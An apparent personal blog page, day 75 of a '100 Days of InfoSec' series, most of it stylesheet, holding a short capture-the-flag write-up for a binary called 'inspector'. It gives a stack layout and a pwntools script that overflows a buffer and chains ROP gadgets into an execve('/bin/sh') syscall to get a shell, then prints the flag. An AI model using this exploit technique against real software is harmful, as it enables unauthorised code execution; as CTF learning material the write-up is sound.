			counter-reset: lst-ctn-kix_avc0gcoxesrz-6 0
		}

		.lst-kix_pj27egx948rq-2>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-2
		}

		.lst-kix_5bbn6o1fums7-8>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-8
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		ol.lst-kix_n6wv8d8mqg4j-2.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-2 0
		}

		ol.lst-kix_q172a0nf55p3-0.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-0 0
		}

		ol.lst-kix_pj27egx948rq-6.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-6 0
		}

		ol.lst-kix_n6wv8d8mqg4j-1.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		ol.lst-kix_5bbn6o1fums7-7.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-7 0
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-3>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-3
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_avc0gcoxesrz-4.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-4 0
		}

		.lst-kix_avc0gcoxesrz-7>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-7
		}

		ol.lst-kix_q172a0nf55p3-2.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-2 0
		}

		.lst-kix_q172a0nf55p3-5>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-5, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-6>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-6, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		.lst-kix_5bbn6o1fums7-1>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-1
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-1, lower-latin) ". "
		}

		.lst-kix_571au0wapsr5-3>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-3
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		ol.lst-kix_pj27egx948rq-4.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-4 0
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-3.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-7 0
		}

		ol.lst-kix_q172a0nf55p3-3.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-3 0
		}

		.lst-kix_n6wv8d8mqg4j-5>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-5
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-6 0
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-0 0
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5bbn6o1fums7-6>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-6
		}

		.lst-kix_571au0wapsr5-8>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-8
		}

		.lst-kix_571au0wapsr5-5>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-5, lower-roman) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-2>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-2, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-6>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-6, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-7 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_lh5aqr9xz8oa-8 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-5 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-6 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-3 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-3>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-3, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-4 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-1 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-1>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-1, lower-latin) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-6>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-6
		}

		ol.lst-kix_avc0gcoxesrz-1 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-4>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-4
		}

		ol.lst-kix_avc0gcoxesrz-8 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-6 0
		}

		ol.lst-kix_avc0gcoxesrz-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-0>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-0, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-4 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-8>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-7>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-7, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-2 0
		}

		ol.lst-kix_avc0gcoxesrz-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-3 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-0.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-0 0
		}

		.lst-kix_pj27egx948rq-4>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-4
		}

		.lst-kix_n6wv8d8mqg4j-7>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-7
		}

		ol.lst-kix_t8twi5tix7m3-5.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-5 0
		}

		ol.lst-kix_avc0gcoxesrz-0.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-0 0
		}

		.lst-kix_avc0gcoxesrz-4>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		ol.lst-kix_q172a0nf55p3-5 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-7 0
		}

		.lst-kix_c8glqpz4x2ma-8>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-3 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-0, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-3.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-3 0
		}

		ol.lst-kix_q172a0nf55p3-8 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6 {
			list-style-type: none
		}

		.lst-kix_c8glqpz4x2ma-0>li:before {
			content: "-  "
		}

		.lst-kix_avc0gcoxesrz-4>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-4
		}

		.lst-kix_c8glqpz4x2ma-4>li:before {
			content: "-  "
		}

		ol.lst-kix_t8twi5tix7m3-4.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-4 0
		}

		ol.lst-kix_q172a0nf55p3-8.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-8 0
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-5>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-5
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		.lst-kix_n6wv8d8mqg4j-0>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-0
		}

		ol.lst-kix_q172a0nf55p3-1 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-0 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-1>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-1
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c6 {
			color: #ce9178;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c4 {
			background-color: #1e1e1e;
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.5;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c10 {
			color: #6a9955;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c8 {
			color: #000000;
			font-weight: 300;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c18 {
			padding-top: 14pt;
			text-indent: 36pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c20 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c14 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c0 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c3 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #569cd6;
			font-weight: 400
		}

		.c13 {
			color: #434343;
			font-weight: 400;
			font-size: 14pt;
			font-family: "Montserrat"
		}

		.c12 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #c586c0;
			font-weight: 400
		}

		.c9 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #b5cea8;
			font-weight: 400
		}

		.c22 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d7ba7d;
			font-weight: 400
		}

		.c7 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #ce9178;
			font-weight: 400
		}

		.c15 {
			color: #000000;
			font-weight: 400;
			font-size: 14pt;
			font-family: "Montserrat"
		}

		.c19 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c16 {
			color: #000000;
			font-weight: 400;
			font-size: 11pt;
			font-family: "Arial"
		}

		.c5 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d4d4d4;
			font-weight: 400
		}

		.c17 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c11 {
			text-decoration: none;
			vertical-align: baseline;
			font-style: normal
		}

		.c2 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c1 {
			height: 11pt
		}

		.c21 {
			height: 14pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c17">
	<h3 class="c18" id="h.3zvpwyx0el37"><span class="c19">75<br></span><span
			class="c19">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c20" id="h.uhn6dzi5itr4"><span class="c2">CTFd &mdash; &nbsp;inspector (part 2 - executing ROP)</span>
	</h3>
	<p class="c0 c1"><span class="c16 c11"></span></p>
	<p class="c0 c1"><span class="c11 c16"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0"><span class="c15 c11">41 41 41 41 41 41 41 41 &nbsp;&lt;-- rsp (rbp-0x20)</span></p>
	<p class="c0"><span class="c15 c11">41 41 41 41 41 41 41 41</span></p>
	<p class="c0"><span class="c15 c11">41 41 41 41 41 41 41 41</span></p>
	<p class="c0"><span class="c15 c11">41 41 41 41 41 41 41 41</span></p>
	<p class="c0"><span class="c15 c11">&nbsp;4242424242424242 &nbsp;&lt;-- old rbp</span></p>
	<p class="c0"><span class="c15 c11">&nbsp;RETURN_ADDRESS &nbsp;&lt;-- gadget_n instr prior to the ret instr </span>
	</p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0"><span class="c15 c11">think about parameter/arg</span></p>
	<p class="c0 c1"><span class="c16 c11"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c4"><span class="c12">from</span><span class="c5">&nbsp;pwn </span><span class="c12">import</span><span
			class="c5 c11">&nbsp;*</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c5">pop_rdi = p64(</span><span class="c3">0x</span><span class="c9">0040062e</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">binsh = p64(</span><span class="c3">0x</span><span class="c9">00400708</span><span
			class="c5">) </span><span class="c10">#address pointing to string &#39;/bin/sh&#39;</span></p>
	<p class="c4"><span class="c5">pop_rsi = p64(</span><span class="c3">0x</span><span class="c9">00400636</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">rsi_val = p64(</span><span class="c3">0x</span><span class="c9">0</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">pop_rdx = p64(</span><span class="c3">0x</span><span class="c9">0040063e</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">rdx_val = p64(</span><span class="c3">0x</span><span class="c9">0</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">pop_rax = p64(</span><span class="c3">0x</span><span class="c9">00400646</span><span
			class="c5 c11">)</span></p>
	<p class="c4"><span class="c5">rax_val = p64(</span><span class="c3">0x</span><span class="c9">3b</span><span
			class="c5">) </span><span class="c10">#decimal 59</span></p>
	<p class="c4"><span class="c5">system = p64(</span><span class="c3">0x</span><span class="c9">00400625</span><span
			class="c5">) </span><span class="c10">#call system with rax val</span></p>
	<p class="c4"><span class="c5">main = p64(</span><span class="c3">0x</span><span class="c9">0040064a</span><span
			class="c5">) </span><span class="c10">#for continuity of program</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c5">payload = </span><span class="c7">&#39;A&#39;</span><span class="c5">*</span><span
			class="c3">0x</span><span class="c9">20</span><span class="c5">&nbsp;+ </span><span
			class="c7">&#39;B&#39;</span><span class="c5">*</span><span class="c3">0x</span><span
			class="c9">8</span><span class="c5 c11">&nbsp;+\</span></p>
	<p class="c4"><span class="c5 c11">pop_rdi + binsh +\</span></p>
	<p class="c4"><span class="c5 c11">pop_rsi + rsi_val +\</span></p>
	<p class="c4"><span class="c5 c11">pop_rdx + rdx_val +\</span></p>
	<p class="c4"><span class="c5 c11">pop_rax + rax_val +\</span></p>
	<p class="c4"><span class="c5">system + main + </span><span class="c7">&#39;</span><span class="c22">\n</span><span
			class="c6">&#39;</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c5">gdb_script = </span><span class="c6">&#39;&#39;&#39;</span></p>
	<p class="c4"><span class="c6">b * 0x000000000040066d</span></p>
	<p class="c4"><span class="c6">b * 0x0000000000400672</span></p>
	<p class="c4"><span class="c6">&#39;&#39;&#39;</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c5">p = process (</span><span class="c7">&#39;./inspector&rsquo;</span><span
			class="c5">)</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c10"># gdb.attach(p, gdb_script)</span></p>
	<p class="c4"><span class="c5">p.sendafter(</span><span class="c7">&#39;shell!</span><span
			class="c22">\n</span><span class="c7">&#39;</span><span class="c5 c11">, payload)</span></p>
	<p class="c4"><span class="c5 c11">p.interactive()</span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4 c1"><span class="c5 c11"></span></p>
	<p class="c4"><span class="c10"># gadget_2 ==&gt; pop rdi; ret [0x0040062e] (&quot;/bin/sh\x00&quot; &lt;--
			rsp)</span></p>
	<p class="c4"><span class="c10"># gadget_3 ==&gt; pop rsi; ret [0x00400636] (0x0 &lt;-- rsp)</span></p>
	<p class="c4"><span class="c10"># gadget_4 ==&gt; pop rdx; ret [0x0040063e] (0x0 &lt;-- rsp)</span></p>
	<p class="c4"><span class="c10"># gadget_5 ==&gt; pop rax; ret [0x00400646] (0x59 &lt;-- rsp)</span></p>
	<p class="c4"><span class="c10"># gadget_1 ==&gt; system &nbsp; &nbsp; &nbsp; [0x00400625]</span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0"><span class="c15 c11">When I give the input &#39;A&#39;*0x20 + &#39;/bin/sh\x00&#39; + &hellip;</span>
	</p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0"><span class="c15 c11">\0x7fffffffde50 is the address for the /bin/sh part of the input on the stack.
			However, although this works locally, the stack addresses on the server will be different so this
			won&rsquo;t work there</span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c11 c15"></span></p>
	<p class="c0"><span class="c15 c11">Hence, I found the &ldquo;/bin/sh&rdquo; string in the program and hard coded
			that address because that gadget address will remain the same on the server as well</span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c8"></span></p>
	<p class="c0 c1"><span class="c8"></span></p>
	<p class="c0"><span class="c8">Flag : flag{inspect0r_gadg3t_1542cf43a84b}</span></p>
	<p class="c0 c1"><span class="c8"></span></p>
	<p class="c0 c1"><span class="c8"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<p class="c0 c1"><span class="c15 c11"></span></p>
	<h3 class="c20 c21" id="h.dardaoz37s2v"><span class="c11 c13"></span></h3>
	<hr>
	<p class="c14"><span class="c15 c11">
		<a href='/100days/day74.html'>Previous</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/'>Home</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/day76.html'>Next</a>
	</span>
	</p>
</body>

</html>